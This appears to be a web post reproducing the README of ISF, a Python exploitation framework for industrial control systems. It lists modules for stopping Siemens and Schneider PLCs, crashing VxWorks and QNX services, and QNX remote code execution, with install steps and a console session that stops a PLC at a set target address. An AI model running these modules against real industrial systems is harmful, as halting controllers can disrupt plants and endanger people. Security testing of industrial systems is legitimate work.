Industrial Exploitation Framework: a exploitation framework

Industrial Exploitation Framework

ISF(Industrial Exploitation Framework) is an exploitation framework based on Python, it’s similar to the Metasploit framework.

ISF is based on open source project routersploit.

ICS Protocol Clients

NamePathDescription
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyModbus-TCP Client
wdb2_clienticssploit/clients/wdb2_client.pyWdbRPC Version 2 Client(Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pys7comm Client(S7 300/400 PLC)

Exploit Module

NamePathDescription
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyS7-300/400 PLC start/stop
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyVxworks RPC remote dos(CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pySchneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyQNX Inetd TCP service dos
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyQNX qconn remote code execution

Scanner Module

NamePathDescription
profinet_dcp_scanscanners/profinet_dcp_scan.pyProfinet DCP scanner
vxworks_6_scanscanners/vxworks_6_scan.pyVxworks 6.x scanner

ICS Protocols Module (Scapy Module)

These protocol can used in other Fuzzing framework like Kitty or create your own client.

NamePathDescription
pn_dcpicssploit/protocols/pn_dcpProfinet DCP Protocol
modbus_tcpicssploit/protocols/modbus_tcpModbus TCP Protocol
wdbrpc2icssploit/protocols/wdbrpc2WDB RPC Version 2 Protocol
s7commicssploit/protocols/s7comm.pyS7comm Protocol

Install

Requirement:
gnureadline (OSX only)
requests
paramiko
beautifulsoup4
pysnmp
python-nmap
scapy

git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

 

 

Usage

root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

 

 

Exploits

isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

 

Options

isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

 

Set options

isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {‘target’: ‘192.168.70.210’}

Run module

isf (S7-300/400 PLC Control) > run
[*] Running module…
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Display information about an exploit

isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu <jtrkid[at]gmail.com>

References:

isf (S7-300/400 PLC Control) >

 

Copyright (c) 2017, dark-lbp
All rights reserved.

Source: https://github.com/dark-lbp/

Share